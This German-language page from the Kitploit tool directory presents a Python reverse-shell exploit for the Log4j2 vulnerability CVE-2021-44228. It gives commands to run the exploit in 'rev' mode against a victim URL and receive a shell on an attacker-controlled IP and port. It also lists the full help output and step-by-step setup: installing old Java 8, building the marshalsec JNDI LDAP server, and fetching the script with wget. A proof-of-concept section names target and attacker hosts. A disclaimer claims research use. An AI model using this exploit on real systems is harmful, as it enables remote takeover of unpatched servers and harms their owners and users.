Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4j2-CVE-2021-44228-revshell — Log4j2 CVE-2021-44228 revshell, natürlich ist es schlecht!! | Kitploit
Tools/GitHubGitHub/faisalfs10x/log4j2-cve-2021-44228-revshell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubfaisalfs10x/log4j2-cve-2021-44228-revshell

Log4j2-CVE-2021-44228-revshell

Log4j2 CVE-2021-44228 revshell, natürlich ist es schlecht!!

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
1822vor 4 JahrenNoch nicht geprüft
Teilen

Log4j2-CVE-2021-44228-revshell

Verwendung

root@kitploit:~
Für Reverse-Shell:
$~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

Zur Überprüfung auf Ausnutzbarkeit:
$~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

$~  python3 Log4j2-revshell.py -h
    usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT
                              [-hp HTTPPORT] [-V]

    Log4j2 CVE-2021-44228 Reverse-Shell

    optional arguments:
      -h, --help            zeigt diese Hilfemeldung an und beendet
      -M MODE, --mode MODE  Modus: check | rev
      -u TARGET, --target TARGET
                            Ziel-URL (vollständig), http://www.victimLog4j.xyz:8080
      -l LHOST, --lhost LHOST
                            Angreifer-IP zum Empfangen der Reverse-Shell
      -p LPORT, --lport LPORT
                            Angreifer-Port zum Empfangen der Reverse-Shell
      -hp HTTPPORT, --httpport HTTPPORT
                            HTTP-Server-Port auf dem Angreifer-Host, Standard ist 8888
      -V, --version         zeigt die Programmversion an und beendet

Voraussetzungen

root@kitploit:~
1. Marshalsec jndi.LDAPRefServer # siehe hier, https://github.com/mbechler/marshalsec
2. Java 8 # Sie können Java 8 hier herunterladen https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html, 
   empfohlen wird die Installation von jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
3. Dieses Skript, Log4j2-revshell.py

TL;DR; Schritt-für-Schritt-Anleitung

root@kitploit:~
$ Öffnen Sie den Browser und laden Sie Java 8 herunter von https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 
  Im Abschnitt Java SE Development Kit 8u181 wählen Sie jdk-8u181-linux-x64.tar.gz oder das passende Paket für Ihr Betriebssystem.
    
$ sudo mkdir /usr/lib/jvm #Erstellen Sie dieses Verzeichnis, falls es noch nicht existiert
$ cd /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #Entpacken Sie das heruntergeladene jdk-8u181-linux-x64.tar.gz in /usr/lib/jvm
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version #Überprüfen Sie, ob Java 1.8.0_181 läuft

$ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #Installieren Sie marshalsec jndi.LDAPRefServer
$ sudo apt install -y maven #Erstellen Sie marshalsec mit dem Java-Builder Maven. Wenn Sie Maven nicht haben, installieren Sie es bitte zuerst
$ mvn clean package -DskipTests #Erstellen Sie das marshalsec-Tool mit Maven 
$ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py

$ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

PoC

root@kitploit:~
Ziel-Host: http://192.168.5.122:8080
Angreifer-Host: 192.168.5.120

https://user-images.githubusercontent.com/51811615/146068317-23af25f4-9e5b-42bb-960b-6775edd5be03.mp4

Getestet auf

root@kitploit:~
- Ubuntu 18.04

Haftungsausschluss:

root@kitploit:~
Das Skript dient ausschließlich der Sicherheitsanalyse und Forschung, daher übernehme ich keine Haftung, falls es für illegale Aktivitäten genutzt wird.
Tool herunterladen